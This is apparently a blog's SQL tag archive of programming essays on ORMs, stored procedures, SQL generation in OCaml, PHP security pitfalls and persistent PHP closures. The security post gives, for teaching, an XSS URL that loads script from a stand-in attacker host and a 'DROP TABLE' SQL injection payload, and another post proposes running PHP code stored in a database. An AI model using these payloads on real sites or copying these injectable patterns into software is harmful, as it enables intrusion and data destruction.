Tag Archive for 'SQL'

Heterogeneity

John is a fairly adept PHP developer. He is familiar with object-oriented features from PHP 5, has experimented with some PHP 6 features, and is quite skilled at bending the Zend or Symphony frameworks to his will.

But John is not really an SQL expert—sure, he might have written some simple queries and he can fight his way around a normalized database, but he’d rather use a mapping layer on the PHP side. He is no fan of JavaScript either, although he can sometimes hack together a quick solution based on his limited knowledge and online tutorials. And John is in trouble, because web development is ultimately a heterogeneous environment where you have to know three languages to get things going.

There have been many efforts to help out programmers like John by eliminating as many languages as possible from the process. Database mapping tools provide a protective layer that shields SQL-averse programmers from the unfathomable Lovecraftian horror of INNER JOIN. Ready-made components encapsulate clever JavaScript so that server-side developers don’t have to muck in the demeaning task of keeping browsers in line.

I’ve had the pleasure of working on both sides of the fence. Some of my projects were beautifully streamlined 98% PHP – 1% JS – 1% SQL works of art where the various pieces of non-PHP code were carefully hidden away from the prying eyes and trembling hands of PHP developers. Others had a complete architecture designed for each of the three languages, with team members that specialized in certain areas only, and strong conventions on how data had to cross the borders. These were not toy projects, but rather large websites that had to support the brunt of thousands of visits.

The bottom line is that when you’re running a website with the intent to get money out of it, you want as many daily hits as possible, and so the software must be able to handle all of them smoothly. If you are writing your own web software, the burden of optimizing that software is yours as well. This involves identifying bottlenecks and reimplementing them to do less work, so that you will eventually need:

  1. Developers that are familiar enough with the software and any third party elements involved.
  2. Profiling tools that help identify what parts of the software take the most time.
  3. A software model that is flexible enough to allow reimplementing critical pieces.

It is generally observed that [weasel words] the layers of PHP/C#/Java code stacked to hide away the SQL/JS/CSS/HTML underneath will decrease the performance of the software, because databases are queried with SQL and web pages are presented in JS/CSS/HTML regardless of what one-language programmers would like to believe, so the layers end up generating that code themselves, often with hilarious results.

A classic example would be server-side code for displaying a list of objects (displayed here as PHP):

$user_id = Controller::getCurrentUser();
$user    = UserFactory::getById($user_id);
$friends = $user -> getFriendsList();

foreach ($friends as $friend_id) {
  $friend = UserFactory::getById($friend_id);
  View::renderUser($friend);
}

This is an actual excerpt from a piece of code I wrote, with only slight rewording of certain components. A naive implementation would result in a first query reading from the database the data for the current user (with a list of 200 friends), then 200 more queries reading the individual users from the friend list. This results in a slow-loading page, a dead database and an unhappy customer (believe me, I’ve tried). The PHP-only programmer answers with a blank stare, because the code is properly written and well-encapsulated.

Now, here’s the million dollar question: can your mapping layer be configured so that the above code can get all the data in one, two or three queries?

The project I that code is coming from relied on Zend_Db for database work, which could hardly be called anything but naive. The optimization approach was to place a caching layer between the user factory and the database, and configure that layer with rules such as “if the developer calls getFriendsList, the next time UserFactory::getById is called, precache the data for all the users returned in the list of friends”. This meant that only two queries were made, which happened to save the day on that particular project.

Still, my point is not whether your favourite ORM can achieve the same performance as hand-written SQL code. Some of them certainly can.

My point is that to write software that has database interaction as a bottleneck, you need programmers that understand the database interaction layer thoroughly. Whether that layer is a PHP/C#/Java ORM or plain old SQL requests is irrelevant—without knowledge of how data is pulled from the database, there will be no way to prevent or eliminate bottlenecks reliably.

The ORM system Foo can eliminate the need for SQL experts, but it creates the need for Foo experts instead. What is important, then, is whether it’s easier to find Foo experts or SQL experts.

Stretched Thin

Lately, I have heard people refer to Object-Relational Mapping as being equivalent to the advent of compilers in the grand scheme of things, abstracting away relational semantics (which, like assembly, was the domain of expert hackers with overclocked brains and guru-like status that understood it) behind a nice and clean object interface that normal programmers could use. Think of the productivity gains!

And yet, a lot of non-technical people whose jobs include data mining will learn SQL at some point in their career. This includes many people in academia (you have to process that empirical data), librarians and various industry managers. And, from my experience, they have an easier time learning it than the average programmer—who is used to seeing the programming world in an imperative fashion.

The easiest way to explain SQL queries is to think in terms of merge and filter operations. The first step is to merge all the tables you need together. This happens as a cartesian product operation: if you merge two tables, you get a table that contains, as its lines, all pairs consisting in one line from the first table and one line from the second table. So, if you merge five tables with 100 records each, you get a nasty result set containing ten billion records. This is where filtering comes in: of all the records, you only need those who satisfy certain properties. One classic example is performing a join: you only keep the a record if its sub-records share the same key value, thereby turning your ten billion records back into a hundred. And, of course, the mathematical properties of relational algebra allow the database system to reorder certain merge and filter operations, so that you don’t first compute all ten billion rows and only then start filtering them.

As such, SQL is a very practical language: ‘FROM’ and ‘JOIN’ merge tables, ‘WHERE’ and ‘ON’ filter records, and the remaining ‘SELECT’, ‘ORDER BY’, ‘GROUP BY’ and ‘LIMIT’ further format the results returned to the user.

Besides, most database systems also provide features for defining functions and procedures within the database to run almost arbitrary code. This makes it possible to write an entire application that does nothing but parse user input and forward database output back to the user. The database would then take care of the business logic, data storage, and output formatting. Of course, having the database output formatted HTML based on its contents would be crazy. Or would it?

Layered Architectures

The average website is layered. There’s the dispatch layer, which receives the HTTP request and dispatches it to the appropriate controller based on the domain and URI. Then, there’s the controller layer, which parses the user input and initiates the business logic and uses view components to send data back to the user. Underneath, there’s the model, containing both business data and business logic. And below the model is the database itself.

Different architectures give each layer a different weight. Some may have heavy controllers that perform most of the logic, and very thing model and storage layers. Others may have a very thin controller, and rely on the model for everything save the most elementary output formatting.

What if we completely eliminated the model? All the business logic would be stored in the database as stored procedures and stored functions, and all the model would have to do is provide simple points of access to the procedures themselves: format arguments, run the stored procedure as a query, return the result set or success/failure. Oh, and of course, decide whether the query should be sent to the master database or to a slave.

There are a few advantages of doing things this way:

  • Performance benefits. Most of the time, the processing that has to be done by the system between the first request and the last request of a given session is very light (or, if it isn’t, proper architecture would demand that it be done asynchronously anyway). By performing everything on the database server, one wastes some time by having the database perform some processing that could have been done by the web script itself, but eliminates all the overhead related to serializing and sending data and the lock overhead for keeping a session locked too long, and allows the database to optimize queries ahead of time based on hints given when declaring the stored procedures and functions.
  • Abstraction benefits. When you need to make a database and a program communicate, you just have to create an abstraction that can serve as an interface between the two. If you decide that all operations on the database have to go through stored procedures, then you will end up with a flurry of stored procedures that completely hide the actual storage approach used by the database.
  • Interoperability. Any software that can connect to your database system can use the interface. This means that you can write asynchronous processing units in other languages that work with the database to perform costly computations (such as indexing). It also means that, if your software is intended to work on client computers, your client can develop extensions against the database.

There are, of course, downsides as well:

  • You need SQL developers and SQL architects. By definition, storing your model in the database means that you will have a relational design as opposed to an object-oriented design. Relational design is by no means inferior, but there are fewer people fluent enough with it than there are object-oriented designers, if only because it’s not encountered as often.
  • You might end up using non-portable SQL. By keeping your SQL simple (and hidden behind a Hibernate dialect) you guarantee that your system can be re-deployed to another database system if you need to improve performance, adjust to cost issues or adapt to the architecture of your customer.
  • It’s harder to deploy. Stored procedures are installed on the database by running SQL queries that create them. This is an order of magnitude harder than just zipping up a JAR or packing an assembly and uploading it to the server, and two orders of magnitude harder than just copying your PHP source directory to the server. Of course, there are tools that allow editing stored procedures on the server on-the-fly, but they often lose you the benefit of source control.

Choose wisely.

Quick MySQL Identifier Escaping

A quick code snippet, in Objective Caml, that illustrates escaping an identifier in MySQL. Identifiers are quoted between backticks (`) and backticks within identifiers are escaped by writing two adjacent backticks (“). Escaping identifiers mean turning “Hello`World” into “`Hello“World`”.

This function turns an identifier into a quoted identifier, with a single memory allocation. It uses stack space that is linear in the number of backticks to escape within the identifier (which is at most 256, given traditional MySQL limits).

The code is in the public domain.

let string_of_name name =
  let rec escape c b i =
    try
      let next = String.index_from name i '`' in
      let str = escape (c+1) next (next+1) in
        String.blit name b str (b+c+1) (next-b+1) ;
        str
    with Not_found ->
      let size = String.length name + c + 2 in
      let str = String.create size in
        str.[0] <- '`' ;
        str.[size-1] <- '`' ;
        String.blit name b str (b+c+1) (String.length name - b) ;
        str
  in escape 0 0 0
;;

More is Worse

Countless stories and folk tales relate the story of a man who sought or otherwise found boundless power, which proved too much to handle and ultimately destroyed him. Yet, what brought most of us to programming is the unmistakable feeling of omnipotence, the ability to make the machine do anything one desires provided that one can explain how to do it.

And, inevitably, the bitter taste of experience teaches us that omnipotence is the greatest curse that has ever befallen the computer programmer or the system administrator, leaving us to face the new generation of programmers who delight in the latest programming language version of the swiss army knife, favoring expressiveness over safety and security.

Much to my delight, PHP has been a historical breeding ground for such low-safety, low-security, low-verbosity solutions.

Automatic global variables

Perhaps the oldest and most delicate security issue in PHP was the automatic registration of request arguments as global variables. Consider the simple PHP script that displays a countdown in bold and italics:

assert (is_int($count)); 

while ($count > 0) 
  $result .= string($count--) . ", "; 

$result .= "Fire!"; 

echo '<p>In bold: <b>'.$result.'</b>.</p>';
echo '<p>In italics: <i>'.$result.'</i>.</p>';

This snippet uses two common productivity-enhancing features of the earlier PHP incarnations: the fact that variables could be used without being initialized (so $result is initially null, implicitly converted to the empty string, and then used) and the automatic registration of variables, allowing $count to equal what is now known as $_REQUEST['count'] (which could be provided, for instance, by accessing http://example.com/script.php?count=3).

Obviously, this creates huge vulnerabilities. For instance, a short piece of code such as the one above could very well contain an XSS (cross-site scripting) vulnerability! It’s enough for an attacker to find out that the script uses a variable named $result (fairly easy with open source software) and provide an initial value for it, for instance injecting some javascript on another page. The victim would be vulnerable when following an URL such as:

http://example.com/script.php?count=0&result=<script src=http://haxor.com/hax.js></script>

Now that the attacker has injected arbitrary JS in thevictim’s browser on the page that is being attacked, he can do anything as if he were the victim, using the victim’s session on the target site.

Needless to say, PHP has already restricted the use of automatic global registration to contain this evil.

SQL Queries

Yet another high-productivity improvement in PHP is its tight connection with the MySQL database management system. In the good old days when “real programmers” had to update an account balance in a database, they would write a stored SQL procedure which received the account balance as an argument and performed the correct manipulation, then they would write some web server code that connected to the database and called that stored procedure.

PHP allows its users to brutally shorten the amount of work necessary for that:

function update_balance($id, $amount)
{
  mysql_connect();
  mysql_query(
    "UPDATE accounts " .
    "SET balance = balance + $amount " .
    "WHERE id = $id");
}

This code works by generating an SQL query as a string, then sending that query over the connection to the MySQL database manager, which runs it as-is. This code contains a classic SQL injection vulnerability, where the attacker provides values of the $id or $amount variables that generate malicious SQL code. For instance, providing $amount = “0; DROP TABLE accounts; –” and $id = 0 results in the generated (and executed) SQL statements:

UPDATE accounts SET balance = balance + 0;
DROP TABLE accounts;
-- WHERE id = 0

Of course, this assumes that there are no other safety rules that filter out invalid values for $amount or $id (which must be integers). But when the data being stored is a bit of text, which should be stored as-is regardless of what it contains, the safety checks disappear and the vulnerability becomes apparent (and often exploited, sometimes in the least expected ways).

There are certainly workaround for this, the first of them being the existence of mysql_real_escape_query, which eliminates any risk of injection, provided that it is used, and it’s easy to forget using it (not to mention the overhead of using it). Many frameworks provide their own version of a query generator that automatically escapes query arguments. My own mini-framework involves:

$link = mysql_connect();
qprintf(
  $link, 
  "UPDATE accounts "
  . "SET balance = balance + {0} "
  . "WHERE id = {1}", 
  $amount, $id);

And the Zend Framework involves:

$select = $this 
  -> select()
  -> where('id = ?', $id); 

$row  = $this -> fetchRow($select);
$data = array('balance' => $row -> balance + $amount); 

$where = $this 
  -> getAdapter()
  -> quoteInto('id = ?', $id); 

$this 
  -> update($array, $where);

To account for the unsafety of the short version, more code has to be added.

Remote file access

In the beginning, accessing a remove file (for instance, at the other end of an http:// address) in PHP was a difficult task that involved manually connecting to the server to fetch the file (using cURL, for instance).

Then, the elementary file-opening function fopen gained the ability to open remote files with several protocols (and the possibility to add more).  Suddently, the old fifteen-line routine for reading the contents of an RSS feed became as simple as readfile(“http://example.com/rss.php”), and there was much rejoicing.

One thing led to another, and code using that feature began to multiply using patterns such as these:

function display_quoted($url)
{
  print '<blockquote>';
  @readfile($url);
  print '</blockquote>';
}

Except that, while readfile documented that it could open both local and remote files, display_quoted only documents that it can open remote files. And when a local path is passed to display_quoted, well, you’ve just output config.inc.php and the database passwords that were hidden in there.

The solution, of course, is to distinctly separate functions which operate on local files from functions which operate on remote files. It’s certainly possible to keep on using readfile to perform remote access, but additional checks should be made to guarantee that it’s performing remote access and note local access.

SQL Generation, Part 2

Introduction

This is a follow-up of an older article, which examined automatic generation of relational database tables to represent an entity-property-binding data structure. That article concluded by stating that the next step would be the generation of queries.

Deletion, modification and reading queries all have the ability to affect a subset of the available instances of an entity. This article is dedicated to providing subset semantics and a way to compile them to SQL.

Naive solution

In the most naive implementation, subsets would be either singletons (that is, all operations affect a single instance at a time) or the entire set (that is, all operations affect all instances). A simple modification would also allow constructing subsets through union operations from the singletons.

val all : entity -> subset 
val singleton : id -> subset 
val union : id list -> subset

Subsets would then be of the form ” or ‘WHERE id = $1 OR id = $2 …‘, which can be generated in mere seconds from Objective Caml code, and could be easily appended to any SQL query (select, delete, update) to determine the working set for that query.

The advantage of this solution is that it’s very simple to implement. The problem is that it moves all the processing from the database to the host code, which then has to sort through heaps of data (and send huge queries to select a large subset that’s not the entire set) to achieve anything meaningful.

Predicate-based solution

Most queries performed on a database are either based on identifiers (thus possible with singletons) or based on logic predicates. As such, a subset is merely the set of all instances of an entity which satisfy a given predicate (such as having a certain e-mail address, or being born before a certain date, or simply being the sole element of a singleton). This semantic approach is used in SQL (the WHERE clause introduces a predicate) and showcased with a distinct syntax in a recent article.

A basic predicate system involves writing a first-order logical expression (that is, without quantifiers) which applies to a single variable (an instance of the appropriate entity) to support the following operations:

P(x) = atom(x) | P(x) × P(x) | P(x) + P(x) | ¬ P(x)

An atom is any elementary comparison between two expressions involving constants, query parameters, the identifier of the instance and its properties. For instance, an example of atom would be less (property “created”) (sub curDate (days 30)), indicating that the instance is older than 30 days, corresponding to WHERE created < DATEADD(“dd”,-30,CURRENT_DATE()) (your SQL dialect may vary).

In this situation, the subset can be translated into an SQL sentence to be placed after the WHERE, with the rules:

atom     -> compile(atom)
Not(p)   -> "NOT (" tr(p) ")"
And(p,q) -> "(" tr(p) "AND" tr(q) ")"
Or(p,q)  -> "(" tr(p) "OR" tr(q) ")"

A preprocessing operation could be to move all Not operations to atoms using the De Morgan rules, and instead negate only atoms, or even convert the predicate to a normal form.

By encapsulating subset operations in a type-safe, no-leak system, it becomes possible to propagate the construction of SQL queries to helper modules, for instance a module that provides the subset of recent elements  (younger than 30 days), which may then be intersected or unified at will with other subsets to obtain a full query.

Further work

All of the above does not handle bindings (which are the entity-property-binding representation of cross-table searching). The possible semantics, along with the actual implementation of bindings through SQL joins (and the consequences of that implementation on SQL UPDATE and DELETE queries) remains to be seen in a futher article.

SQL Generation, Part 1

As a complementary solution to generating PHP views is the generation of PHP models in a Model-View-Controller approach. In this example, the following model is used:

  • A user has a first name, a last name, and a password (stored as a hash).
  • A user may have at most one session, which contains an optional IP and an optional session token.
  • A user has a list of favorites (stored as URLs).

To represent these constraints, the Objective Caml code below is used:

let structure  =
  empty
  >> create_entity "user"
    [ "firstname", "VARCHAR(255) NOT NULL" ;
      "lastname", "VARCHAR(255) NOT NULL" ;
      "passhash", "VARCHAR(64) NOT NULL" ]
  >> add_extension "user" "session"
    [ "ip", "VARCHAR(16) NULL" ;
      "token", "VARCHAR(64) NULL" ]
  >> add_list_field "user" "favorites" "VARCHAR(255)"

Note: here, the >> operator is used to mean x >> f == f(x). An extension defines an entity as being tied to another entity with optional semantics: the user entity may have at most one session entity, and a given session always has exactly one associated user. A list field associates several elementary values of a certain type with a single entity in a classic one-to-many relationship. The above structure is automatically transformed by a compiler function into this SQL code:

CREATE TABLE `user` (
  `id` INT NOT NULL AUTO_INCREMENT PRIMARY KEY,
  `passhash` VARCHAR(64) NOT NULL,
  `lastname` VARCHAR(255) NOT NULL,
  `firstname` VARCHAR(255) NOT NULL
); 

CREATE TABLE `session` (
  `token` VARCHAR(64) NULL,
  `ip` VARCHAR(16) NULL,
  `user` INT NOT NULL UNIQUE REFERENCES `user`(`id`)
); 

CREATE TABLE `user_favorites` (
  `value` VARCHAR(255),
  `user` INT NOT NULL REFERENCES `user`(`id`)
);

Design and rationale

The underlying data structure used by the generator is divided into three main categories:

  • Entities are the core concept, they are uniquely identified by a name. In themselves, they carry no information, except for an identifier which can be used to distinguish two entities of the same type from one another (for instance, differentiating two users using their key). Entities can have properties and can be related to each other by bindings.
  • Properties add a basic piece of information (an integer, a string or something close) to an entity. All entities of a given type have that property.
  • Bindings tie together two types of entities. A binding incorporates the notion of arity, meaning that it may relate zero or one, exactly one, or many entities of a type with zero or one, exactly one, or many entities of another type. A binding may also be normalized : either it is made part of the first entity type (meaning the arity for the other type cannot be “many”), or it is made part of the second type (meaning the arity for the first type cannot be “man”), or it is turned into a standalone relationship which gets its own table.

This structure differs from the typical “table with columns” approach that is prevalent in SQL in particular and in relational algebra in general, though it is perfectly equivalent to the latter : while an entity-property-binding representation can be turned into a table-column representation by making every entity and binding a table, and sticking properties as columns of the entity tables, the reverse transform is possible:

  • A table is an entity.
  • The non-reference columns of a table are properties of that table’s entity.
  • The reference columns of a table are bindings of the appropriate arity.

For the purposes of generating code, however, the entity-property-binding method is superior because it separates properties from bindings : while a property affects only the entity to which it is associated, a binding affects two entities. For instance, the unique identifier for an entity is not generated if that entity is an extension (that is, it is bound to exactly one other entity of another type, and is not subject to any other bindings). Also, because of normalization being a configurable option, it’s possible to decide whether the binding is a relationship or a column.

The entire data structure is kept in a single object, which acts as an associative container where new entities, properties and bindings may be added. The implementation of simple add_entity, add_property, add_binding functions allow the creation of more elaborate data structure generators:

let create_entity e l s =
  s >> add_entity e
    >> add_fields e l

let add_extension e n l s =
  s >> add_entity n
    >> add_binding (`One e) (`Option n) e `B
    >> add_fields n l  

let add_list_field e n k s =
  let n = e ^ "_" ^ n in
  s >> add_entity n
    >> add_fields n ["value",k]
    >> add_binding (`One e) (`Many n) e `B

The `B argument means that the binding should be inserted into the right member of the relationship.

Implementation

A minimally documented implementation is available for download here : files/articles/sql-gen-1.ml

Design patterns

As with PHP views, Objective Caml can now serve as a meta-language, useful for describing processes that lead to the creation of data structures, and in particular of typical database design patterns. For instance, consider a simple rights management system, where a table maps object/user pairs with a set of rights (and a different such table exists for every kind of objects that can have rights). Adding rights management is then done as:

let add_rights users objects rights s =
  let id = objects ^ "_rights" in
  s >> create_entity id
    [ "rights" , "set(" ^ String.concat "," rights ^ ") NOT NULL" ]
    >> add_binding (`Many id) (`One users) "user" `A
    >> add_binding (`Many id) (`One objects) objects `A 

let structure =
  empty
  >> add_entity "user"
  >> add_entity "page"
  >> add_rights "user" "page" [ "read" ; "write" ]

Similarly, one could define a tree with the nodes referencing data from a given entity type:

let add_binary_tree_of data name s =
  s >> add_entity name
    >> add_binding (`Many name) (`One data) "data" `A
    >> add_binding (`One name) (`Option name) "left" `A
    >> add_binding (`One name) (`Option name) "right" `A 

let structure =
  empty
  >> add_entity "node"
  >> add_binary_tree_of "node" "tree"

Further work

Now that the underlying data structure itself can be generated automatically, the operations (either in a high-level language or directly as SQL stored procedures) appears as a logical next step.

Persistent PHP Closures

As a sequel to the previous installment of Dynamic Wednesdays, this article considers the next step in closure manipulation in PHP: persistence. Persistence is the process of preserving a part of program state from one execution to another. In the execution model of PHP, scripts are executed independently (and concurrently) and their working memory is flushed from memory when they end. The only preserved data is that which is sent back to the HTTP client, and that which is saved in the database.

This makes several typical design patterns quite impractical for any usage that extends beyond a single HTTP request: for instance, an API designer may wish the users of the API to be notified of certain events (for instance, the modification of a piece of data). In a typical non-transactional application, the user modules would register themselves with the API by use of the Observer design pattern (or, in more functional terms, a callback) which would remain stored in the API until the application shuts down, and the observer would be notified of the relevant events. This kind of behavior is, in terms of functionality, perfectly supported by PHP.

However, for this to work, every HTTP request must execute in a completely initialized environment. This requires the server to create a new instance of every core object, then load and initialize all objects provided by the third party users (thereby setting up the aggregation links required by the Observer design pattern through registration with the core objects), and finally run the HTTP request which, most of the time, will not trigger the observer at all. In short, using these techniques in PHP requires massive and mostly useless initialization times that would be best done without.

Partial workarounds do exist: after all, the only requirement to avoid initialization costs is to persist the inter-object relationships in the database. For instance, if a certain user wants to be notified when a certain product is back in stock, his user identifier would be associated with the product identifier in a “waiting for stock” table in a relational database. Observing that a user was associated to the product, the server would then load the user-related code, seek the user by its identifier, and proceed to send the notification. This partial solution, however, is incomplete, since it does not support the Open-Closed principle. Since neither the source code to be loaded (user-related, for instance) nor the relational database table allow for polymorphism, a third party developer cannot extend the product notification system to notify something other than a user.

Using a database

The above observations lead to a simple conclusion: to achieve robust persistence of closures, it is necessary to allow polymorphic behavior in terms of source file to be added, and in terms of code to be executed. This implies that the database will have to store both a list of source files to be loaded from disk when the persisted closure is called, and a description of what code should be called. This means either providing a single function name, or a piece of PHP code accompanied by a serialized list of the closure contents.

Despite the obvious danger of storing executable PHP code directly in a database, I will suggest going with that option as a preliminary step, possibly using a specific user for modifying closures, and giving all other users only the right to SELECT and DELETE from the closures table. SQL pseudocode for the database would be as follows:

CREATE TABLE `closures` (
    `id` INT NOT NULL AUTO_INCREMENT,
    `exec` TEXT NOT NULL, -- PHP code to be run.
    PRIMARY KEY(`id`));
-- To insert a new closure and get the coresponding ID:
INSERT INTO `closures` (`exec`) VALUES ('@exec')
-- To extract a closure's data
SELECT `exec` FROM `closures` WHERE `id` = @id
-- To drop an unused closure
DELETE FROM `closures` WHERE `id` = @id

Creating a closure involves four arguments: the list of source files to include to be able to run the closure (this will be prepended to the PHP code stored in the database), the formal parameter, the source code to be executed, and the list of arguments stored in the closure (this will be serialized by value, so no references are allowed here). Again, in a pseudocode fashion:

function create_persistent_closure($include, $args, $code, $data) {
  foreach($include as $file) 
    $src .= "require_once('$file');"
  foreach(array_values($args) as $id => $arg) 
    $src .= sprintf('$%s = function_get_arg(%d);', $arg, $id);
  foreach($data as $var => $value)
    $src .= sprintf('$%s = unserialize(\'%s\');', $var,
                    addcslashes(serialize($value), '\\\''));
  return add_to_database($src . $code);
} 

function get_persistent_closure($id) {
  return create_function('', get_from_database($id));
}

The return value of get_persistent_closure is a callable function which will execute the stored code. Note that due to the limitations of serialization in PHP, the list of arguments stored in the closure will generally be a set of identifiers and indices used to retrieve the actual objects to be manipulated (from factories and singletons). For instance:

// When registering an observer (first HTTP request)
$closure = create_persistent_closure(
    array( 'core/models/user.php' ), 
    '$product_id', 
    'UserFactory::Get($user_id)->SendProductNotification($product_id);', 
    array('user_id' => $user_id)); 

Store::Get($store_id)->AddObserver($closure); 

// When notifying observers (second HTTP request)
foreach ($this->closures as $id) {
    $func = get_persistent_closure($id);
    $func($product_id);
    drop_from_database($func); 
} 

$this->closures = array();

Using code generation

The above example, while full of good ideas, is insufficient. The main reason is, of course, safety: anyone with write access to the appropriate database table can cause arbitrary code to be executed, and this is easy if an SQL injection vulnerability exists. By contrast, storing the source code as files on disk is safer: write access to the disk already bears the risk of executing arbitrary code simply by uploading it. By restricting PHP-implemented uploads to a specific directory that is kept separate from the persistent closure cache, one can ensure the safety of the code.

By using source files serialized to disk, however, one runs the risk of multiple access to the same file. Therefore, it is advised that the file is manipulated using locking primitives to avoid those issues.

I will not provide the complete implementation here. However, the basic idea behind this implementation is to provide a directory containing the persistent closures. The closures are saved to relative paths within that directory, of the form ‘module/params/reason’, for instance ‘store/1013/onProductRestock’. The closures are stored inside the event handler that will be using them, thereby improving performance when several closures are used by the same handler (thus avoiding multiple loads).

The typical usage would be:

// When registering an observer (first HTTP request)   
Store::Get($store_id) -> GetHandler() -> Register(
    array( 'core/models/user.php' ),  
    '$product_id',  
    'UserFactory::Get($user_id)->SendProductNotification($product_id);',  
    array('user_id' => $user_id));  

// When notifying observers (second HTTP request)  
$handler = $this -> GetHandler();
$handler -> Call($product_id);
$handler -> Clear();

// Inside the GetHandler function
return new EventHandler("store/" . $this->store_id . "/onProductRestock");


1170 feed subscribers
(readers who polled a feed this week)